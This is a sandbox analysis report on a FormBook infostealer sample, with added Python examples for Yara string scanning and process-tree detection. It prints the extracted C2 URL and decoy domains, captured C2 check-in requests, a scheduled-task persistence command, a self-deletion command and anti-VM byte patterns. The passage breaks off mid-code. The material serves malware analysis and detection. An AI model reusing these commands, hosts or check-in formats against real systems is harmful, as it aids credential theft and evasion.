
Analysis Report ORDER SPECIFICATIONS.exe

Overview

General Information

Sample Name: ORDER SPECIFICATIONS.exe
Analysis ID: 356492
MD5: e75a4df51162401b21c3eb79718fb3db
SHA1: 3328ead22db03ce461cb8bdb5d59638120e2444f
SHA256: 48709c3e07c128283d9d550331d6e5f7c4afeadfc61cad94d769ea8ce7399e77
Tags: exe, Formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • ORDER SPECIFICATIONS.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: E75A4DF51162401B21C3EB79718FB3DB)
    • schtasks.exe (PID: 6476 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ORDER SPECIFICATIONS.exe (PID: 6520 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)
    • ORDER SPECIFICATIONS.exe (PID: 6552 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5308 cmdline: /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.athomecp.com/owws/"], "decoy": ["trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com", "greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com", "brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com", "codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com", "adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com", "davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com", "ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net", "raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net", "renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com", "xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com", "your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com", "sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club", "siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(18 entries in total; the remaining memory-dump matches are not reproduced here)

      Unpacked PEs

Source | Rule | Description | Author
0.2.ORDER SPECIFICATIONS.exe.2b26b2c.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(8 entries in total; the remaining unpacked-PE matches are not reproduced here)
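Both community rules above match on fixed byte sequences, and the same hex strings hit at the same offsets in the process-5 memory dump and in the unpacked PE, which is what you expect when the dump is the unpacked payload. As an added example (not part of the report, and not the source of either rule), the Python below re-implements that string scan over a raw memory dump with no yara dependency, using the hex strings exactly as the report prints them, and decodes what two of them are: the three JPCERT strings are single x86 `push imm32` instructions, and yara-signator's $sequence_0 contains RDTSC, the timing check behind the report's "detect virtualization through RDTSC time measurements" finding. The memory buffer is constructed; the rules' conditions (how many strings must hit) are not on the page and are not reproduced.

```python
import re
import struct
from typing import Dict, List, Optional

# Hex strings copied verbatim from the report's Yara Overview.
FORMBOOK_1 = {  # rule Formbook_1, Felix Bilstein / yara-signator
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
JPCERT_FORMBOOK = {  # rule Formbook, JPCERT/CC Incident Response Group
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}


def scan(buf: bytes, strings: Dict[str, str]) -> Dict[str, List[int]]:
    """Offsets of every occurrence of each hex string in buf, like `yara -s`."""
    hits: Dict[str, List[int]] = {}
    for name, hexstr in strings.items():
        needle = bytes.fromhex(hexstr)
        offsets = [m.start() for m in re.finditer(re.escape(needle), buf)]
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(hexstr: str) -> Optional[int]:
    """The constant pushed if the pattern is one x86 `push imm32` (opcode 68).
    All three JPCERT strings are such pushes; their names tie the constants to
    sqlite3_step and the sqlite3 text/blob column accessors, the SQLite API
    that browser credential stores are read through. A 32-bit constant pushed
    right before a call has no relocations, so it is a stable in-memory marker."""
    raw = bytes.fromhex(hexstr)
    if len(raw) != 5 or raw[0] != 0x68:
        return None
    return struct.unpack("<I", raw[1:])[0]


def uses_rdtsc(hexstr: str) -> bool:
    """Crude check (no disassembly) for the RDTSC opcode 0F 31. $sequence_0 is
    `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, i.e. a timing delta,
    which is the anti-VM technique the report's RDTSC signature describes."""
    return b"\x0f\x31" in bytes.fromhex(hexstr)


# Constructed stand-in for a memory dump: filler with three hits embedded.
SAMPLE_DUMP = (b"\x90" * 0x20 + bytes.fromhex(FORMBOOK_1["$sequence_0"])
               + b"\xcc" * 0x10 + bytes.fromhex(JPCERT_FORMBOOK["$sqlite3step"])
               + b"\x00" * 0x10 + bytes.fromhex(FORMBOOK_1["$sequence_0"]) + b"\xcc" * 8)


def report(buf: bytes) -> Dict[str, Dict[str, List[int]]]:
    """Per-rule string hits. The rules' conditions are not reproduced on the
    page, so whether a rule fires as a whole is not decided here."""
    return {"Formbook_1": scan(buf, FORMBOOK_1), "Formbook": scan(buf, JPCERT_FORMBOOK)}


if __name__ == "__main__":
    for rule, hits in report(SAMPLE_DUMP).items():
        for name, offs in hits.items():
            print(f"{rule} {name}: {[hex(o) for o in offs]}")
    print("pushed constant:", hex(push_imm32(JPCERT_FORMBOOK["$sqlite3step"])))
```

On a real dump (for example the `.sdmp` files Joe Sandbox exports, or a `procdump`-style full dump of the injected chkdsk.exe) the offsets returned by `scan()` are what `yara -s` would print; the point of checking the JPCERT pushes separately is that they keep matching even when the surrounding code differs between FormBook builds.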

            Sigma Overview

            System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security
Data:
  Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
  CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
  ParentImage: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
  ParentProcessId: 6336
  ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
  ProcessId: 6476
Note: the command line names System32\schtasks.exe while Image is SysWOW64\schtasks.exe. The sample is a 32-bit process, so WOW64 file system redirection resolves System32 to SysWOW64; a rule keyed on the image path has to accept both directories. The task name Updates\LvZiFDk matches the dropped file C:\Users\user\AppData\Roaming\LvZiFDk.exe listed under AV Detection.
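The Startup tree and this Sigma hit together describe three process-level behaviours: schtasks.exe creating a task from an XML definition in the user's temp directory, the sample starting its own image twice (the launch pattern behind "Creates a process in suspended mode" and the process-hollowing finding), and a SysWOW64 system binary under explorer.exe running cmd /c del on the original file. As an added example that is not part of the report, the Python below rebuilds those events as Sigma-style process_creation records (constructed from the tree; the field names are the Sigma ones, the cmd.exe image path is assumed since the report gives only its MD5) and implements the three checks over them.

```python
import re
from typing import Any, Dict, List, Optional, Tuple

# Constructed Sigma-style process_creation events modelled on the report's
# Startup tree. Joe Sandbox prints double quotes as single quotes; they are
# restored here. explorer.exe (PID 3472) hangs under PID 6552 in the report only
# because FormBook's injected code runs inside it; in a real event feed it is a
# pre-existing process, so no parent is recorded for it (ParentProcessId 0).
Event = Dict[str, Any]
EVENTS: List[Event] = [
    dict(ProcessId=6336, ParentProcessId=0,
         Image=r"C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe",
         CommandLine=r'"C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe"'),
    dict(ProcessId=6476, ParentProcessId=6336,
         Image=r"C:\Windows\SysWOW64\schtasks.exe",  # WOW64 redirection of System32
         CommandLine=r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LvZiFDk" '
                     r'/XML "C:\Users\user\AppData\Local\Temp\tmpDA15.tmp"'),
    dict(ProcessId=6484, ParentProcessId=6476,
         Image=r"C:\Windows\System32\conhost.exe",
         CommandLine=r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    dict(ProcessId=6520, ParentProcessId=6336,
         Image=r"C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe",
         CommandLine=r"C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe"),
    dict(ProcessId=6552, ParentProcessId=6336,
         Image=r"C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe",
         CommandLine=r"C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe"),
    dict(ProcessId=3472, ParentProcessId=0,
         Image=r"C:\Windows\explorer.exe", CommandLine=r"C:\Windows\explorer.exe"),
    dict(ProcessId=6364, ParentProcessId=3472,
         Image=r"C:\Windows\SysWOW64\chkdsk.exe", CommandLine=r"C:\Windows\SysWOW64\chkdsk.exe"),
    dict(ProcessId=5308, ParentProcessId=6364,
         Image=r"C:\Windows\SysWOW64\cmd.exe",  # assumed path; the report prints only the MD5
         CommandLine=r'/c del "C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe"'),
    dict(ProcessId=5396, ParentProcessId=5308,
         Image=r"C:\Windows\System32\conhost.exe",
         CommandLine=r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
_TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp|Temp)\\", re.IGNORECASE)


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def temp_task_xml(ev: Event) -> Optional[str]:
    """The /XML path if ev is schtasks.exe creating a task from a definition
    stored in a temp directory (the report's Sigma hit), else None."""
    if basename(ev["Image"]) != "schtasks.exe":
        return None
    args = split_cmdline(ev["CommandLine"])
    lowered = [a.lower() for a in args]
    if "/create" not in lowered or "/xml" not in lowered:
        return None
    i = lowered.index("/xml") + 1
    xml_path = args[i] if i < len(args) else ""
    return xml_path if _TEMP_DIR.search(xml_path) else None


def self_spawns(events: List[Event]) -> List[Tuple[int, int]]:
    """(parent_pid, child_pid) pairs where a process starts its own image again."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    pairs = []
    for ev in events:
        parent = by_pid.get(ev["ParentProcessId"])
        if parent and parent["Image"].lower() == ev["Image"].lower():
            pairs.append((parent["ProcessId"], ev["ProcessId"]))
    return pairs


def self_delete_chains(events: List[Event]) -> List[str]:
    """Paths removed by `cmd.exe /c del` where cmd.exe was started by a Windows
    system binary that explorer.exe launched (explorer -> SysWOW64 chkdsk -> cmd
    in the report). explorer.exe starting system binaries is normal; the `del`
    of a user-path executable two hops down is the signal."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    deleted = []
    for ev in events:
        if basename(ev["Image"]) != "cmd.exe":
            continue
        args = split_cmdline(ev["CommandLine"])
        lowered = [a.lower() for a in args]
        if "/c" not in lowered or "del" not in lowered or lowered.index("del") + 1 >= len(args):
            continue
        parent = by_pid.get(ev["ParentProcessId"])
        grand = by_pid.get(parent["ParentProcessId"]) if parent else None
        if not (parent and grand):
            continue
        parent_dir = parent["Image"].lower().rsplit("\\", 1)[0]
        if parent_dir.endswith(("\\system32", "\\syswow64")) and basename(grand["Image"]) == "explorer.exe":
            deleted.append(args[lowered.index("del") + 1])
    return deleted


def triage(events: List[Event]) -> Dict[str, list]:
    return {
        "temp_task_xml": [p for p in (temp_task_xml(ev) for ev in events) if p],
        "self_spawns": self_spawns(events),
        "self_deletes": self_delete_chains(events),
    }


if __name__ == "__main__":
    for finding, value in triage(EVENTS).items():
        print(f"{finding}: {value}")
```

The three checks are independent on purpose: the temp-XML task is a good stand-alone rule, while the self-spawn and the delete chain are better used as enrichments that raise the score of a process tree, since a legitimate installer can also start a second copy of itself.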

            Signature Overview


            AV Detection:

Found malware configuration
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack | Malware Configuration Extractor: FormBook (the configuration is reproduced in full under Malware Configuration above: one C2, www.athomecp.com/owws/, and 64 decoy domains)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\LvZiFDk.exe | ReversingLabs: Detection: 14%
Multi AV Scanner detection for submitted file
Source: ORDER SPECIFICATIONS.exe | Virustotal: Detection: 30%
Source: ORDER SPECIFICATIONS.exe | ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\LvZiFDk.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ORDER SPECIFICATIONS.exe | Joe Sandbox ML: detected
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

Uses 32bit PE files
Source: ORDER SPECIFICATIONS.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: ORDER SPECIFICATIONS.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: chkdsk.pdbGCTL | source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb | source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298571038.00000000015BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: ORDER SPECIFICATIONS.exe, chkdsk.exe
Note: the chkdsk.pdb and wntdll.pdb strings come from Microsoft's own chkdsk.exe and the 32-bit ntdll, not from the sample's build; finding chkdsk.pdb inside ORDER SPECIFICATIONS.exe's memory is consistent with the sample mapping chkdsk.exe before the injection shown in the Startup tree.
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 4x nop then jmp 0725D85Ch
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

            Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.athomecp.com/owws/
Source: global traffic | HTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1 | Host: www.abaplants.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1 | Host: www.cyjulebu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1 | Host: www.denisekohli.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1 | Host: www.hostsnc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1 | Host: www.assemble-4u.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1 | Host: www.raphaelyejesiel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1 | Host: www.your-new-body-plan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1 | Host: www.softwaresreports.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
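Every Host header in the captured requests is a domain from the configuration's "decoy" list; the configured C2 (www.athomecp.com) is never contacted during the run. FormBook cycles through its decoy domains as well as the real C2, so a short sandbox capture can, as here, consist of decoy traffic only, and the destination addresses in the Snort alerts above are the addresses those decoy hosts resolved to, not the C2. As an added example that is not part of the report, the Python below rebuilds the eight captured GET requests and the extracted configuration (both copied from this page), parses each request, scores it against the check-in shape the report shows (GET to the C2 path, two query parameters with one long base64-alphabet value, no User-Agent, Connection: close, NUL-byte body) and classifies the Host as C2, decoy or unknown. In practice the raw requests would come from a PCAP or proxy log rather than the inline list.

```python
import json
import re
from typing import Any, Dict, List, Tuple
from urllib.parse import urlsplit

# Configuration exactly as the sandbox extracted it (copied from the report).
CONFIG = json.loads("""{"C2 list": ["www.athomecp.com/owws/"], "decoy": [
"trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com",
"greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com",
"brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com",
"codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com",
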